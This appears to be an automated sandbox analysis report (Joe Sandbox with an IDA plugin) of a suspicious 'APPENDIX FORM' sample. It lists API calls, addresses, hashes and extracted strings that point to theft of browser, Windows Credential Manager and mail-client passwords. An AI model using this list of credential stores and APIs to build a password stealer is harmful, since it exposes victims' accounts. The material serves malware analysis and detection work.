                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                              • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                              • API String ID: 2003275452-3138536805
                                                                                                              • Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                              • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                              • Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                              • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040C3F7
                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                              • strrchr.MSVCRT ref: 0040C417
                                                                                                              • _mbscat.MSVCRT ref: 0040C431
                                                                                                              • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                              • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                              • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                              • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                              • API String ID: 1012775001-1343505058
                                                                                                              • Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                              • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                              • Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                              • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00444612
                                                                                                                • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                              • strlen.MSVCRT ref: 0044462E
                                                                                                              • memset.MSVCRT ref: 00444668
                                                                                                              • memset.MSVCRT ref: 0044467C
                                                                                                              • memset.MSVCRT ref: 00444690
                                                                                                              • memset.MSVCRT ref: 004446B6
                                                                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                              • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                              • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                              • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                              • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                              • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                              • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpymemset$strlen$_mbscpy
                                                                                                              • String ID: salu
                                                                                                              • API String ID: 3691931180-4177317985
                                                                                                              • Opcode ID: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                              • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                              • Opcode Fuzzy Hash: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                              • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$Library$FreeLoad
                                                                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                              • API String ID: 2449869053-232097475
                                                                                                              • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                              • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                              • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                              • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                              APIs
                                                                                                              • sprintf.MSVCRT ref: 0040957B
                                                                                                              • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                                • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                                • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                                • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                                • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                              • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                              • sprintf.MSVCRT ref: 004095EB
                                                                                                              • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                              • memset.MSVCRT ref: 0040961C
                                                                                                              • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                              • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                              • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                              • String ID: caption$dialog_%d$menu_%d
                                                                                                              • API String ID: 3259144588-3822380221
                                                                                                              • Opcode ID: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                              • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                              • Opcode Fuzzy Hash: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                              • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                              APIs
                                                                                                                • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                              • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                              • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                              • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                              • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                              • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$Library$FreeLoad
                                                                                                              • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                              • API String ID: 2449869053-4258758744
                                                                                                              • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                              • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                              • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                              • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                              APIs
                                                                                                              • wcsstr.MSVCRT ref: 0040426A
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                              • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                              • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                              • strchr.MSVCRT ref: 004042F6
                                                                                                              • strlen.MSVCRT ref: 0040430A
                                                                                                              • sprintf.MSVCRT ref: 0040432B
                                                                                                              • strchr.MSVCRT ref: 0040433C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                              • String ID: %s@gmail.com$www.google.com
                                                                                                              • API String ID: 3866421160-4070641962
                                                                                                              • Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                              • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                              • Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                              • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                              • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                              • API String ID: 2360744853-2229823034
                                                                                                              • Opcode ID: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                              • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                              • Opcode Fuzzy Hash: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                              • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                              APIs
                                                                                                              • strchr.MSVCRT ref: 004100E4
                                                                                                              • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                              • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                              • _mbscat.MSVCRT ref: 0041014D
                                                                                                              • memset.MSVCRT ref: 00410129
                                                                                                                • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                              • memset.MSVCRT ref: 00410171
                                                                                                              • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                              • _mbscat.MSVCRT ref: 00410197
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                              • String ID: \systemroot
                                                                                                              • API String ID: 912701516-1821301763
                                                                                                              • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                              • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                              • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                              • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                              APIs
                                                                                                                • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                              • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409686
                                                                                                              • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409696
                                                                                                              • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                                • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                              • API String ID: 888011440-2039793938
                                                                                                              • Opcode ID: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                              • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                              • Opcode Fuzzy Hash: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                              • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                              APIs
                                                                                                                • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                              • strchr.MSVCRT ref: 0040327B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PrivateProfileStringstrchr
                                                                                                              • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                              • API String ID: 1348940319-1729847305
APIs
• memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
• memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
• memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
Strings
Memory Dump Source
• Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: memcpy
• String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
• API String ID: 3510742995-3273207271
APIs
• memset.MSVCRT ref: 004094C8
• GetDlgCtrlID.USER32(?), ref: 004094D3
• GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
• memset.MSVCRT ref: 0040950C
• GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
• _strcmpi.MSVCRT ref: 00409531
  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
Strings
Memory Dump Source
• Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
• String ID: sysdatetimepick32
• API String ID: 3411445237-4169760276
APIs
• SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
• SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
• LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
• LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
• GetSysColor.USER32(0000000F), ref: 0040B472
• DeleteObject.GDI32(?), ref: 0040B4A6
• DeleteObject.GDI32(00000000), ref: 0040B4A9
• SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
Memory Dump Source
• Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: MessageSend$DeleteImageLoadObject$Color
• String ID:
• API String ID: 3642520215-0
APIs
• GetSystemMetrics.USER32(00000011), ref: 004072E7
• GetSystemMetrics.USER32(00000010), ref: 004072ED
• GetDC.USER32(00000000), ref: 004072FB
• GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
• GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
• ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
• GetWindowRect.USER32(004012E4,?), ref: 0040732C
• MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
Memory Dump Source
• Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
• String ID:
• API String ID: 1999381814-0
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: memcpymemset
• String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
• API String ID: 1297977491-3883738016
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: __aulldvrm$__aullrem
• String ID: -$-x0$0123456789ABCDEF0123456789abcdef
• API String ID: 643879872-978417875
APIs
• memset.MSVCRT ref: 0040810E
  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
• LocalFree.KERNEL32(?,?,?,?,?,00000000,7686EB20,?), ref: 004081B9
  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
Strings
Memory Dump Source
• Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
• String ID: POP3_credentials$POP3_host$POP3_name
• API String ID: 524865279-2190619648
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: ItemMenu$CountInfomemsetstrchr
• String ID: 0$6
• API String ID: 2300387033-3849865405
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: _mbscat$memsetsprintf
• String ID: %2.2X
• API String ID: 125969286-791839006
                                                                                                              APIs
                                                                                                                • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
